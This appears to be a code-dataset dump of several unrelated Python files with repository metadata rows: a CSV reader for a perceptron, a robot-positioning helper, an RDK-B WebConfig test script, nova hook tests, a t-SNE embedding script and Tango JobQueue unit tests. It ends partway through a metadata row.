        # Remove fd callbacks from the group's options, falling back to
        # the top-level options when the group has none.
        dfopts = envopts.find_option(data_flow_group + "_options")
        if dfopts != None:
            dfopts.remove_dispatcher_fd_cbs()
        else:
            envopts.remove_dispatcher_fd_cbs()
    @classmethod
    def append_monitoring_dispatcher_cbs(cls,envopts,data_flow_group):
        envopts.update_ref(stk_append_monitoring_fd_cbs(data_flow_group,envopts.ref()))
    @classmethod
    def remove_monitoring_dispatcher_cbs(cls,envopts,data_flow_group):
        dfopts = envopts.find_option(data_flow_group + "_options")
        if dfopts != None:
            dfopts.remove_dispatcher_fd_cbs()
    @classmethod
    def log(cls,level,message):
        stk_log(level,message)
    @classmethod
    def debug(cls,component,message):
        stk_debug(component,message)
| 34.276471 | 104 | 0.763686 | 913 | 5,827 | 4.529025 | 0.144578 | 0.062878 | 0.027086 | 0.025393 | 0.50399 | 0.440871 | 0.407013 | 0.390085 | 0.359129 | 0.32237 | 0 | 0.001781 | 0.13283 | 5,827 | 169 | 105 | 34.47929 | 0.816545 | 0.101596 | 0 | 0.411765 | 0 | 0 | 0.008617 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.20915 | false | 0.039216 | 0.039216 | 0.026144 | 0.30719 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b47c0ccbeb35e2ac408d98bd973b27910abd4c8 | 1,163 | py | Python | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | readfile.py | y-azvd/perceptron | 3cd4cefc7ae54bd8a3df702300ee9797389fef4a | [
"MIT"
] | null | null | null | import numpy as np
##
## @brief function_description
##
## @param filename The filename
##
## @return description_of_the_return_value
##
def readfile(filename):
    """Read a comma-separated file, skipping '#' comment lines.

    :param filename: path of the CSV-like file to read.
    :returns: list of rows, each a list of stripped column strings;
        empty columns and blank lines are dropped.
    :raises OSError: if the file cannot be opened.  (The previous
        implementation printed "error" and returned -1, but ``open``
        raises rather than returning a falsy object, so that branch
        was dead code — and ``print "error"`` was Python-2-only.)
    """
    rows = []
    with open(filename, "r") as csvfile:
        for row in csvfile:
            # Lines starting with '#' are comments.
            if row[0] != '#':
                # Strip surrounding whitespace from the line and from
                # every comma-separated column.
                cols = [col.strip() for col in row.strip().split(',')]
                # Keep only non-empty columns.  The original filter used
                # (col != '' or col != '\t'), which is always true and
                # therefore filtered nothing.
                cols = [col for col in cols if col]
                if cols:
                    rows.append(cols)
    return rows
##
## @brief Reads for perceptron.
##
## @param filename The filename
## @param dataType The data type
##
## @return description_of_the_return_value
##
def readForPerceptron(filename, dataType):
    """Load feature rows for a perceptron, splitting off the labels.

    The last column of each row holds the classification; it is copied
    out first and then overwritten with 1 so that the column doubles as
    the bias input.

    :param filename: path of the CSV-like file to read.
    :param dataType: numpy dtype to convert every value to.
    :returns: tuple (features, labels) of numpy arrays.
    """
    raw_rows = readfile(filename)
    features = np.asarray(raw_rows, dtype=dataType)
    # Copy the label column before it is overwritten below
    # (np.asarray would otherwise share memory with 'features').
    labels = np.array(features[:, -1])
    # Replace the label column with the constant bias input of 1.
    features[:, -1] = 1
    return features, labels
0b5048a8c70006e924308165169ee5c4fabe48fa | 934 | py | Python | asar_pi_applications/asar_vision/robot_distance_incorrect.py | ssnover/msd-p18542 | 32bef466f9d5ba55429da2119a14081b3e411d0b | [
"MIT"
] | 3 | 2021-01-07T07:46:50.000Z | 2021-11-17T10:48:39.000Z | asar_pi_applications/asar_vision/robot_distance_incorrect.py | ssnover/msd-p18542 | 32bef466f9d5ba55429da2119a14081b3e411d0b | [
"MIT"
] | 3 | 2018-02-19T20:30:30.000Z | 2018-04-20T23:25:29.000Z | asar_pi_applications/asar_vision/robot_distance_incorrect.py | ssnover95/msd-p18542 | 32bef466f9d5ba55429da2119a14081b3e411d0b | [
"MIT"
] | 1 | 2021-01-07T07:46:52.000Z | 2021-01-07T07:46:52.000Z | import numpy as np
from math import sqrt
def robot_distance_incorrect(robot_actual_location, hexagon_pixel_values,
                             x_scale=1.79, y_scale=1.749):
    """Return the real-world correction vector from the robot's actual
    position to the nearest expected hexagon centre.

    :param robot_actual_location: (x, y) pixel position of the robot.
    :param hexagon_pixel_values: sequence of (x, y) pixel positions of
        candidate hexagon centres.
    :param x_scale: pixels per distance unit along x (default 1.79).
    :param y_scale: pixels per distance unit along y (default 1.749).
        NOTE(review): the units of these scale factors are not
        documented in the original code — confirm against the camera
        calibration before relying on them.
    :returns: (dx, dy) distance to travel to reach the nearest hexagon,
        in real-world units.
    :raises ValueError: if ``hexagon_pixel_values`` is empty.
    """
    if not len(hexagon_pixel_values):
        raise ValueError("hexagon_pixel_values must not be empty")
    rx, ry = robot_actual_location[0], robot_actual_location[1]
    # Euclidean pixel distance from the robot to every hexagon centre.
    distances = [sqrt((rx - p[0]) ** 2 + (ry - p[1]) ** 2)
                 for p in hexagon_pixel_values]
    nearest = hexagon_pixel_values[int(np.argmin(distances))]
    # Pixel offset needed to move the robot onto the chosen centre.
    pixel_distance = (nearest[0] - rx, nearest[1] - ry)
    # Convert the pixel offset into actual distance.
    return (pixel_distance[0] / x_scale, pixel_distance[1] / y_scale)
| 44.47619 | 115 | 0.723769 | 131 | 934 | 4.824427 | 0.343511 | 0.10443 | 0.18038 | 0.080696 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026144 | 0.180942 | 934 | 20 | 116 | 46.7 | 0.8 | 0.175589 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.133333 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b5a82c329031fc6f172ed423012d36ab20bca44 | 10,817 | py | Python | testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py | rdkcmf/rdkb-tools-tdkb | 9f9c3600cd701d5fc90ac86a6394ebd28d49267e | [
"Apache-2.0"
] | null | null | null | testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py | rdkcmf/rdkb-tools-tdkb | 9f9c3600cd701d5fc90ac86a6394ebd28d49267e | [
"Apache-2.0"
] | null | null | null | testscripts/RDKB/component/WEBCONFIG/TS_WEBCONFIG_DisableRFC_QuerySyncParams.py | rdkcmf/rdkb-tools-tdkb | 9f9c3600cd701d5fc90ac86a6394ebd28d49267e | [
"Apache-2.0"
] | null | null | null | ##########################################################################
# If not stated otherwise in this file or this component's Licenses.txt
# file the following copyright and licenses apply:
#
# Copyright 2021 RDK Management
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
<?xml version="1.0" encoding="UTF-8"?><xml>
<id/>
<version>1</version>
<name>TS_WEBCONFIG_DisableRFC_QuerySyncParams</name>
<primitive_test_id/>
<primitive_test_name>Webconfig_DoNothing</primitive_test_name>
<primitive_test_version>1</primitive_test_version>
<status>FREE</status>
<synopsis>To disable the Webconfig RFC and check if a get operation on Force Sync parameters logs DB failure in WebConfig.log file</synopsis>
<groups_id/>
<execution_time>10</execution_time>
<long_duration>false</long_duration>
<advanced_script>false</advanced_script>
<remarks/>
<skip>false</skip>
<box_types>
<box_type>Broadband</box_type>
</box_types>
<rdk_versions>
<rdk_version>RDKB</rdk_version>
</rdk_versions>
<test_cases>
<test_case_id>TC_WEBCONFIG_02</test_case_id>
<test_objective>This test case disables the RFC and checks whether a get operation on the Force Sync parameters logs a DB failure in the WebConfig.log file</test_objective>
<test_type>Positive</test_type>
<test_setup>Broadband</test_setup>
<pre_requisite>1.Ccsp Components in DUT should be in a running state that includes component under test Cable Modem
2.TDK Agent should be in running state or invoke it through StartTdk.sh script
3.Webconfig distro should be enabled else enable with custom image</pre_requisite>
<api_or_interface_used>pam_GetParameterValues
pam_SetParameterValues</api_or_interface_used>
<input_parameters>Device.X_RDK_WebConfig.RfcEnable
Device.X_RDK_WebConfig.ConfigFile.1.ForceSyncCheck
Device.X_RDK_WebConfig.ConfigFile.1.SyncCheckOK"</input_parameters>
<automation_approch>1.Load the module
2.Get the current webconfig RFC enable status and disable the RFC
3.Do a get operation on Force Sync check and Force Sync Check Ok parameters
4.Check if DB failed message specific to the parameter is logged in WebConfig.log File
5.Revert the RFC status to previous
6.Unload the module</automation_approch>
<expected_output>When the webconfig RFC is disabled, a get operation on the Force Sync parameters should log a DB-failed message specific to the parameter in the WebConfig.log file</expected_output>
<priority>High</priority>
<test_stub_interface>WEBCONFIG</test_stub_interface>
<test_script>TS_WEBCONFIG_DisableRFC_QuerySyncParams</test_script>
<skipped>No</skipped>
<release_version>M86</release_version>
<remarks>None</remarks>
</test_cases>
</xml>
'''
# use tdklib library,which provides a wrapper for tdk testcase script
import tdklib;
from tdkbVariables import *;
import tdkutility
from tdkutility import *
from time import sleep;
#Test component to be tested
sysobj = tdklib.TDKScriptingLibrary("sysutil","1");
pamobj = tdklib.TDKScriptingLibrary("pam","1");
#IP and Port of box, No need to change,
#This will be replaced with correspoing Box Ip and port while executing script
ip = <ipaddress>
port = <port>
pamobj.configureTestCase(ip,port,'TS_WEBCONFIG_DisableRFC_QuerySyncParams');
sysobj.configureTestCase(ip,port,'TS_WEBCONFIG_DisableRFC_QuerySyncParams');
#Get the result of connection with test component and DUT
pamloadmodulestatus =pamobj.getLoadModuleResult();
sysloadmodulestatus =sysobj.getLoadModuleResult();
print "[LIB LOAD STATUS] : %s" %pamloadmodulestatus ;
print "[LIB LOAD STATUS] : %s" %sysloadmodulestatus ;
revert = 0;
if "SUCCESS" in pamloadmodulestatus.upper() and "SUCCESS" in sysloadmodulestatus.upper():
#Set the result status of execution
pamobj.setLoadModuleStatus("SUCCESS");
sysobj.setLoadModuleStatus("SUCCESS");
tdkTestObj = pamobj.createTestStep('pam_GetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase("expectedresult");
actualresult = tdkTestObj.getResult();
initial_value = tdkTestObj.getResultDetails().strip();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 1: Get current value of Web Config Enable"
print "EXPECTED RESULT 1: Should get current value of Web Config Enable"
print "ACTUAL RESULT 1: current value is %s" %initial_value;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
tdkTestObj = pamobj.createTestStep('pam_SetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
tdkTestObj.addParameter("ParamValue","false");
tdkTestObj.addParameter("Type","boolean");
expectedresult="SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
result = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
revert =1;
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 2: Set Web Config Enable status to false";
print "EXPECTED RESULT 2: Should set Web Config Enable status to false";
print "ACTUAL RESULT 2: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS";
paramlist = ["Device.X_RDK_WebConfig.ConfigFile.1.ForceSyncCheck","Device.X_RDK_WebConfig.ConfigFile.1.SyncCheckOK"];
logMsgs = ["ForceSyncCheck GET from DB failed","SyncCheckOK GET from DB failed"];
i=0;
for item in paramlist:
tdkTestObj = pamobj.createTestStep('pam_GetParameterValues');
tdkTestObj.addParameter("ParamName",item);
expectedresult="SUCCESS";
#Execute the test case in DUT
tdkTestObj.executeTestCase("expectedresult");
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip();
if expectedresult in actualresult:
print "Querying %s parameter is sucessfull" %item;
print "Check if DB failed message is seen on querying this specific parameter";
sleep(5);
tdkTestObj = sysobj.createTestStep('ExecuteCmd');
expectedresult="SUCCESS";
cmd= "cat /rdklogs/logs/WebConfig.log | grep -rn \"%s\" " %logMsgs[i];
print cmd;
expectedresult="SUCCESS";
tdkTestObj.addParameter("command", cmd);
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
details = tdkTestObj.getResultDetails().strip().replace("\\n", "");
i= i+1;
if expectedresult in actualresult and details:
tdkTestObj.setResultStatus("SUCCESS");
print"%s" %details;
print"The expected log message is present when Queried";
print "[TEST EXECUTION RESULT] : SUCCESS";
else:
tdkTestObj.setResultStatus("FAILURE");
print "The expected log message is not present: %s" %logMsgs[i];
print "[TEST EXECUTION RESULT] : FAILURE";
break;
else:
revert =0;
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 2: Set Web Config Enable status to false";
print "EXPECTED RESULT 2: Should set Web Config Enable status to false";
print "ACTUAL RESULT 2: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
if revert ==1 :
tdkTestObj = pamobj.createTestStep('pam_SetParameterValues');
tdkTestObj.addParameter("ParamName","Device.X_RDK_WebConfig.RfcEnable");
tdkTestObj.addParameter("ParamValue",initial_value);
tdkTestObj.addParameter("Type","boolean");
expectedresult="SUCCESS";
#Execute testcase on DUT
tdkTestObj.executeTestCase(expectedresult);
actualresult = tdkTestObj.getResult();
result = tdkTestObj.getResultDetails();
if expectedresult in actualresult:
#Set the result status of execution
tdkTestObj.setResultStatus("SUCCESS");
print "TEST STEP 3: Revert the Web Config Enable status to previous"
print "EXPECTED RESULT 3: Should revert Web Config status to previous"
print "ACTUAL RESULT 3: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : SUCCESS"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 3: Revert Web Config Enable status to previous"
print "EXPECTED RESULT 3: Should revert Web Config Enable status to previous"
print "ACTUAL RESULT 3: %s" %result;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE"
else:
#Set the result status of execution
tdkTestObj.setResultStatus("FAILURE");
print "TEST STEP 1: Get current value of Web Config Enable"
print "EXPECTED RESULT 1: Should get current value of Web Config Enable"
print "ACTUAL RESULT 1: current value is %s" %initial_value;
#Get the result of execution
print "[TEST EXECUTION RESULT] : FAILURE";
pamobj.unloadModule("pam");
sysobj.unloadModule("sysutil");
else:
print "Failed to load pam/sysutil module";
pamobj.setLoadModuleStatus("FAILURE");
sysobj.setLoadModuleStatus("FAILURE");
print "Module loading failed";
| 49.168182 | 194 | 0.665249 | 1,223 | 10,817 | 5.802126 | 0.224039 | 0.017756 | 0.023253 | 0.021421 | 0.517193 | 0.497322 | 0.477029 | 0.441375 | 0.412627 | 0.412627 | 0 | 0.007152 | 0.237312 | 10,817 | 219 | 195 | 49.392694 | 0.85297 | 0.132569 | 0 | 0.545455 | 0 | 0 | 0.321994 | 0.057092 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.041322 | null | null | 0.297521 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b61d6924578e04d8bbfa01176c73eece0bd32ef | 2,484 | py | Python | nova/tests/test_hooks.py | bopopescu/zknova | 8dd09199f5678697be228ffceeaf2c16f6d7319d | [
"Apache-2.0"
] | null | null | null | nova/tests/test_hooks.py | bopopescu/zknova | 8dd09199f5678697be228ffceeaf2c16f6d7319d | [
"Apache-2.0"
] | null | null | null | nova/tests/test_hooks.py | bopopescu/zknova | 8dd09199f5678697be228ffceeaf2c16f6d7319d | [
"Apache-2.0"
] | 1 | 2020-07-24T08:25:25.000Z | 2020-07-24T08:25:25.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for hook customization."""
import stevedore
from nova import hooks
from nova import test
class SampleHookA(object):
    """Sample hook that records invocations of its *pre* phase."""

    name = "a"

    def _add_called(self, op, kwargs):
        # Append "<op><name>" to the caller-supplied 'called' list,
        # when one was passed in the keyword arguments.
        tracker = kwargs.get('called')
        if tracker is not None:
            tracker.append(op + self.name)

    def pre(self, *args, **kwargs):
        """Record that the pre-hook fired."""
        self._add_called("pre", kwargs)
class SampleHookB(SampleHookA):
    """Sample hook recording both pre (inherited) and post phases."""

    name = "b"

    def post(self, rv, *args, **kwargs):
        """Record that the post-hook fired; *rv* is the call's result."""
        self._add_called("post", kwargs)
class MockEntryPoint(object):
    """Minimal stand-in for a pkg_resources/stevedore entry point:
    ``load()`` simply returns the wrapped class."""

    def __init__(self, cls):
        self.cls = cls

    def load(self):
        """Return the wrapped class, mimicking EntryPoint.load()."""
        return self.cls
class HookTestCase(test.TestCase):
    """Exercise nova.hooks with two stubbed stevedore extensions."""

    def _mock_load_plugins(self, iload, iargs, ikwargs):
        # Replacement for ExtensionManager._load_plugins: return the two
        # sample hooks instead of scanning real entry points.
        return [
            stevedore.extension.Extension('test_hook',
                MockEntryPoint(SampleHookA), SampleHookA, SampleHookA()),
            stevedore.extension.Extension('test_hook',
                MockEntryPoint(SampleHookB), SampleHookB, SampleHookB()),
        ]

    def setUp(self):
        super(HookTestCase, self).setUp()
        hooks.reset()
        # Stub stevedore so hook discovery yields our sample hooks.
        self.stubs.Set(stevedore.extension.ExtensionManager, '_load_plugins',
            self._mock_load_plugins)

    @hooks.add_hook('test_hook')
    def _hooked(self, a, b=1, c=2, called=None):
        # Decorated at class-definition time; the registered hooks run
        # around this method when it is called.
        return 42

    def test_basic(self):
        # The wrapped method still returns its value, and both sample
        # hooks are registered under the 'test_hook' name.
        self.assertEqual(42, self._hooked(1))
        mgr = hooks._HOOKS['test_hook']
        self.assertEqual(2, len(mgr.extensions))
        self.assertEqual(SampleHookA, mgr.extensions[0].plugin)
        self.assertEqual(SampleHookB, mgr.extensions[1].plugin)

    def test_order_of_execution(self):
        # Both pre-hooks run (hook a, then hook b) before the call;
        # only hook B defines a post phase, so 'postb' follows.
        called_order = []
        self._hooked(42, called=called_order)
        self.assertEqual(['prea', 'preb', 'postb'], called_order)
| 28.227273 | 78 | 0.654187 | 308 | 2,484 | 5.165584 | 0.435065 | 0.037712 | 0.016342 | 0.020113 | 0.090509 | 0.061596 | 0 | 0 | 0 | 0 | 0 | 0.012137 | 0.237118 | 2,484 | 87 | 79 | 28.551724 | 0.827441 | 0.272947 | 0 | 0.043478 | 0 | 0 | 0.043113 | 0 | 0 | 0 | 0 | 0 | 0.108696 | 1 | 0.217391 | false | 0 | 0.065217 | 0.065217 | 0.478261 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b649e46fb5914bfe7b320bbcd19fe8e80f42ef7 | 1,624 | py | Python | code_trunk/emb.py | chris4540/DD2430-ds-proj | b876efabe949392b27a7ebd4afb2be623174e287 | [
"MIT"
] | null | null | null | code_trunk/emb.py | chris4540/DD2430-ds-proj | b876efabe949392b27a7ebd4afb2be623174e287 | [
"MIT"
] | null | null | null | code_trunk/emb.py | chris4540/DD2430-ds-proj | b876efabe949392b27a7ebd4afb2be623174e287 | [
"MIT"
] | null | null | null | import torch
from network.siamese import SiameseNet
from network.resnet import ResidualEmbNetwork
import os
import numpy as np
from utils.datasets import DeepFashionDataset
from torchvision.transforms import Compose
from torchvision.transforms import Resize
from torchvision.transforms import ToTensor
from torchvision.transforms import Normalize
from torch.utils.data import Subset
from torch.utils.data import DataLoader
from utils import extract_embeddings
import pickle
from cuml.manifold import TSNE
# Build the siamese embedding model and the image preprocessing pipeline.
emb_net = ResidualEmbNetwork()
model = SiameseNet(emb_net)
trans = Compose(
    [
        Resize((224, 224)),
        ToTensor(),
        # Channel-wise mean/std; presumably computed over the DeepFashion
        # training images -- TODO confirm.
        Normalize([0.7511, 0.7189, 0.7069], [0.2554, 0.2679, 0.2715]),
    ])
model.load_state_dict(torch.load('siamese_resnet18.pth'))
deep_fashion_root_dir = "./deepfashion_data"
train_ds = DeepFashionDataset(
    deep_fashion_root_dir, 'train', transform=trans)
# Only the embedding branch is needed for feature extraction.
emb_net = model.emb_net
emb_net.cuda()
# Embed a random subset of the training set.
n_samples = 25000
sel_idx = np.random.choice(
    list(range(len(train_ds))),
    n_samples, replace=False)
# replace=False guarantees the sampled indices are unique.
assert len(set(sel_idx)) == n_samples
ds = Subset(train_ds, sel_idx)
loader = DataLoader(
    ds, batch_size=100, pin_memory=True, num_workers=os.cpu_count())
print("extracting...")
embeddings, labels = extract_embeddings(emb_net, loader)
# Project the embeddings to 2-D with GPU t-SNE and persist the results.
tsne = TSNE(n_iter=400, metric="euclidean")
projected_emb = tsne.fit_transform(embeddings)
with open('projected_emb.pkl', 'wb') as handle:
    pickle.dump(projected_emb, handle, protocol=pickle.HIGHEST_PROTOCOL)
with open('labels.pkl', 'wb') as handle:
    pickle.dump(labels, handle, protocol=pickle.HIGHEST_PROTOCOL)
| 28.491228 | 72 | 0.76601 | 225 | 1,624 | 5.36 | 0.435556 | 0.029851 | 0.082919 | 0.102819 | 0.135987 | 0.038143 | 0 | 0 | 0 | 0 | 0 | 0.034629 | 0.128695 | 1,624 | 56 | 73 | 29 | 0.817668 | 0.003695 | 0 | 0 | 0 | 0 | 0.059406 | 0 | 0 | 0 | 0 | 0 | 0.022222 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.022222 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0b6a970c6ea0942a3a8927c5faff7c9dff07c309 | 4,096 | py | Python | tests/testJobQueue.py | hartloff/Tango | 9dd867a596441e0e2ba1069017781dddb9c79bdb | [
"Apache-2.0"
] | 2 | 2020-10-30T03:01:55.000Z | 2021-03-25T03:18:12.000Z | tests/testJobQueue.py | hartloff/Tango | 9dd867a596441e0e2ba1069017781dddb9c79bdb | [
"Apache-2.0"
] | 7 | 2018-06-26T02:48:09.000Z | 2021-01-21T03:12:19.000Z | tests/testJobQueue.py | hartloff/Tango | 9dd867a596441e0e2ba1069017781dddb9c79bdb | [
"Apache-2.0"
] | 9 | 2018-09-28T23:48:48.000Z | 2021-10-03T20:29:48.000Z | import unittest
import redis
from jobQueue import JobQueue
from tangoObjects import TangoIntValue, TangoJob
from config import Config
class TestJobQueue(unittest.TestCase):
    """Unit tests for jobQueue.JobQueue, seeded with two sample TangoJobs.

    NOTE: this file uses Python 2 syntax (print statement, xrange).
    """

    def setUp(self):
        # Start from a clean Redis database when the Redis backend is on.
        if Config.USE_REDIS:
            __db = redis.StrictRedis(
                Config.REDIS_HOSTNAME, Config.REDIS_PORT, db=0)
            __db.flushall()
        self.job1 = TangoJob(
            name="sample_job_1",
            vm="ilter.img",
            outputFile="sample_job_1_output",
            input=[],
            timeout=30,
            notifyURL="notifyMeUrl",
            maxOutputFileSize=4096)
        self.job2 = TangoJob(
            name="sample_job_2",
            vm="ilter.img",
            outputFile="sample_job_2_output",
            input=[],
            timeout=30,
            notifyURL="notifyMeUrl",
            maxOutputFileSize=4096)
        # Fresh queue per test with both jobs enqueued.
        self.jobQueue = JobQueue(None)
        self.jobQueue.reset()
        self.jobId1 = self.jobQueue.add(self.job1)
        self.jobId2 = self.jobQueue.add(self.job2)

    def test_sharedInt(self):
        # Two TangoIntValues with the same key share Redis-backed state;
        # the second constructor must not overwrite the existing value.
        if Config.USE_REDIS:
            num1 = TangoIntValue("nextID", 1000)
            num2 = TangoIntValue("nextID", 3000)
            self.assertEqual(num1.get(), 1000)
            self.assertEqual(num1.get(), num2.get())
        else:
            return

    def test_job(self):
        # Assignment state set on the local job object is visible through
        # the copy fetched from the queue.
        self.job1.makeUnassigned()
        self.assertTrue(self.job1.isNotAssigned())
        job = self.jobQueue.get(self.jobId1)
        self.assertTrue(job.isNotAssigned())
        self.job1.makeAssigned()
        print "Checkout:"
        self.assertFalse(self.job1.isNotAssigned())
        self.assertFalse(job.isNotAssigned())

    def test_add(self):
        # setUp added two jobs.
        info = self.jobQueue.getInfo()
        self.assertEqual(info['size'], 2)

    def test_addDead(self):
        # NOTE(review): placeholder test; asserts a tautology.
        return self.assertEqual(1, 1)

    def test_remove(self):
        # Removing both jobs empties the live queue.
        self.jobQueue.remove(self.jobId1)
        info = self.jobQueue.getInfo()
        self.assertEqual(info['size'], 1)
        self.jobQueue.remove(self.jobId2)
        info = self.jobQueue.getInfo()
        self.assertEqual(info['size'], 0)

    def test_delJob(self):
        # delJob with deadjob=0 moves the job to the dead-job list;
        # deadjob=1 then deletes it from the dead-job list.
        self.jobQueue.delJob(self.jobId1, 0)
        info = self.jobQueue.getInfo()
        self.assertEqual(info['size'], 1)
        self.assertEqual(info['size_deadjobs'], 1)
        self.jobQueue.delJob(self.jobId1, 1)
        info = self.jobQueue.getInfo()
        self.assertEqual(info['size_deadjobs'], 0)
        # NOTE(review): return value of a test method is ignored by unittest.
        return False

    def test_get(self):
        # Jobs fetched by id carry that id.
        ret_job_1 = self.jobQueue.get(self.jobId1)
        self.assertEqual(str(ret_job_1.id), self.jobId1)
        ret_job_2 = self.jobQueue.get(self.jobId2)
        self.assertEqual(str(ret_job_2.id), self.jobId2)

    def test_getNextPendingJob(self):
        # Only the unassigned job should be offered as next pending.
        self.jobQueue.assignJob(self.jobId2)
        self.jobQueue.unassignJob(self.jobId1)
        exp_id = self.jobQueue.getNextPendingJob()
        self.assertMultiLineEqual(exp_id, self.jobId1)

    def test_getNextPendingJobReuse(self):
        # NOTE(review): placeholder; not implemented yet.
        return False

    def test_assignJob(self):
        self.jobQueue.assignJob(self.jobId1)
        job = self.jobQueue.get(self.jobId1)
        self.assertFalse(job.isNotAssigned())

    def test_unassignJob(self):
        # Assign then unassign round-trips the 'assigned' flag.
        self.jobQueue.assignJob(self.jobId1)
        job = self.jobQueue.get(self.jobId1)
        self.assertTrue(job.assigned)
        self.jobQueue.unassignJob(self.jobId1)
        job = self.jobQueue.get(self.jobId1)
        return self.assertEqual(job.assigned, False)

    def test_makeDead(self):
        # makeDead moves a live job onto the dead-job list.
        info = self.jobQueue.getInfo()
        self.assertEqual(info['size_deadjobs'], 0)
        self.jobQueue.makeDead(self.jobId1, "test")
        info = self.jobQueue.getInfo()
        self.assertEqual(info['size_deadjobs'], 1)

    def test__getNextID(self):
        # Cycling through the whole id space must never reissue a live
        # job's id; restore the counter afterwards.
        init_id = self.jobQueue.nextID
        for i in xrange(1, Config.MAX_JOBID + 100):
            id = self.jobQueue._getNextID()
            self.assertNotEqual(str(id), self.jobId1)
        self.jobQueue.nextID = init_id
if __name__ == '__main__':
    # Allow running this test module directly.
    unittest.main()
| 29.681159 | 63 | 0.619141 | 460 | 4,096 | 5.386957 | 0.206522 | 0.150121 | 0.06134 | 0.074253 | 0.459645 | 0.368846 | 0.292978 | 0.292978 | 0.25908 | 0.139629 | 0 | 0.027898 | 0.264893 | 4,096 | 137 | 64 | 29.89781 | 0.795085 | 0 | 0 | 0.349057 | 0 | 0 | 0.049561 | 0 | 0 | 0 | 0 | 0 | 0.207547 | 0 | null | null | 0 | 0.04717 | null | null | 0.009434 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b6eaa68175183e78cc2a72bb734ce612395335a | 341 | py | Python | flask_webpack_bundle/config.py | briancappello/flask-webpack-bundle | 67896e6ade345e34721a8f9da156b65fc0646984 | [
"MIT"
] | null | null | null | flask_webpack_bundle/config.py | briancappello/flask-webpack-bundle | 67896e6ade345e34721a8f9da156b65fc0646984 | [
"MIT"
